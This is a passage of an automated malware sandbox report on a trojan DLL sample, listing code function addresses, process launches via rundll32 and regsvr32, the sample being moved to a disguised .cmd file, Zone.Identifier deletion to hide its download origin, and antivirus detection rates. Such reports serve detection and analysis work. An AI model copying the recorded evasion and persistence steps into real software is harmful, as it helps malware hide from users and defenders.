Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10041557	6_2_10041557
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100395A1	6_2_100395A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002F784	6_2_1002F784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1004091B	6_2_1004091B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002EACF	6_2_1002EACF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002FBA4	6_2_1002FBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10035D96	6_2_10035D96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10040E5F	6_2_10040E5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1002EFA4	6_2_1002EFA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E14A66	8_2_04E14A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0DE74	8_2_04E0DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1B257	8_2_04E1B257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E08636	8_2_04E08636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E22009	8_2_04E22009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E17A0F	8_2_04E17A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E185FF	8_2_04E185FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0C5D8	8_2_04E0C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1EFDD	8_2_04E1EFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E217BD	8_2_04E217BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E12142	8_2_04E12142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1654A	8_2_04E1654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1E955	8_2_04E1E955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1FF58	8_2_04E1FF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1AD08	8_2_04E1AD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0670B	8_2_04E0670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1E4E5	8_2_04E1E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0F0E9	8_2_04E0F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E23EE9	8_2_04E23EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E200EF	8_2_04E200EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1BEFD	8_2_04E1BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E080C0	8_2_04E080C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1CAD5	8_2_04E1CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1CCD9	8_2_04E1CCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1D8DB	8_2_04E1D8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E01CA1	8_2_04E01CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1A2A5	8_2_04E1A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E236AA	8_2_04E236AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0BAA9	8_2_04E0BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E13EAA	8_2_04E13EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0C6B8	8_2_04E0C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E10ABA	8_2_04E10ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E10EBC	8_2_04E10EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E246BD	8_2_04E246BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E23263	8_2_04E23263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E20A64	8_2_04E20A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1DC71	8_2_04E1DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0A871	8_2_04E0A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1A474	8_2_04E1A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E07078	8_2_04E07078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E07E79	8_2_04E07E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1567B	8_2_04E1567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0E640	8_2_04E0E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1F840	8_2_04E1F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E07442	8_2_04E07442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0A445	8_2_04E0A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E14244	8_2_04E14244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E12E5D	8_2_04E12E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0B820	8_2_04E0B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E03431	8_2_04E03431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E19A01	8_2_04E19A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E18806	8_2_04E18806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E167E6	8_2_04E167E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E19DF5	8_2_04E19DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E107F4	8_2_04E107F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E127F9	8_2_04E127F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1E1F8	8_2_04E1E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E04BFC	8_2_04E04BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E055FF	8_2_04E055FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1C5D5	8_2_04E1C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0E7DE	8_2_04E0E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1FBDE	8_2_04E1FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E077A3	8_2_04E077A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E207AA	8_2_04E207AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E18FAE	8_2_04E18FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E057B8	8_2_04E057B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1D1BC	8_2_04E1D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0BFBE	8_2_04E0BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E13D85	8_2_04E13D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E16187	8_2_04E16187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E10F86	8_2_04E10F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0238C	8_2_04E0238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0FB8E	8_2_04E0FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E02194	8_2_04E02194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0F369	8_2_04E0F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E14F74	8_2_04E14F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E19774	8_2_04E19774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E15779	8_2_04E15779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E06B7A	8_2_04E06B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1017B	8_2_04E1017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E1437A	8_2_04E1437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0D14C	8_2_04E0D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E22D53	8_2_04E22D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E17D5B	8_2_04E17D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E15333	8_2_04E15333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E01F38	8_2_04E01F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E18D3D	8_2_04E18D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E22B09	8_2_04E22B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E0EF0C	8_2_04E0EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E15515	8_2_04E15515

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030E38 appears 50 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10030535 appears 79 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030E38 appears 58 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030535 appears 87 times

Source: nV5Wu77N8J.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: nV5Wu77N8J.dll	Virustotal: Detection: 16%
Source: nV5Wu77N8J.dll	ReversingLabs: Detection: 13%

Source: nV5Wu77N8J.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll"
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6788 -s 512
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd",JEKd
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oxcjjbulglczzu\tjxbcbc.cmd",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\nV5Wu77N8J.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd",JEKd	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6788 -ip 6788	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6788 -s 512	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Oxcjjbulglczzu\tjxbcbc.cmd",DllRegisterServer	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BDC.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@37/18@0/27

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nV5Wu77N8J.dll",#1

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4624:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:6300:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6788

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_10021183 LoadResource,LockResource,SizeofResource,

5_2_10021183

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000012.00000003.304374143.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304124899.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304021128.0000000004DA9000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000012.00000002.320897103.0000000002D02000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308983031.0000000005175000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000012.00000003.304577343.00000000030BF000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304118861.00000000030BF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308983031.0000000005175000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304133012.00000000030CB000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304258466.00000000030CB000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 00000012.00000003.308927946.0000000005172000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000012.00000003.304133012.00000000030CB000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304258466.00000000030CB000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000012.00000003.308975405.0000000005170000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000012.00000003.304374143.00000000030C5000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304124899.00000000030C5000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.308936560.0000000005178000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.308991217.0000000005178000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.308919933.00000000055C1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000012.00000003.304577343.00000000030BF000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.304118861.00000000030BF000.00000004.00000001.sdmp

Source: nV5Wu77N8J.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: nV5Wu77N8J.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: nV5Wu77N8J.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: nV5Wu77N8J.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: nV5Wu77N8J.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B408E0 push esp; iretd	1_2_02B408E3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_02B31195 push cs; iretd	1_2_02B31197
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1003060D push ecx; ret	5_2_10030620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1003060D push ecx; ret	6_2_10030620
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_10030E7D push ecx; ret	6_2_10030E90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_04E01195 push cs; iretd	8_2_04E01197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 5_2_1003E278 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

5_2_1003E278

Source: nV5Wu77N8J.dll

Static PE information: real checksum: 0x970bf should be: 0x91c5b

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\nV5Wu77N8J.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Oxcjjbulglczzu\tjxbcbc.cmd:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	5_2_100250A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_100250A3 IsIconic,GetWindowPlacement,GetWindowRect,	6_2_100250A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_1001DFC0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	6_2_1001DFC0

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
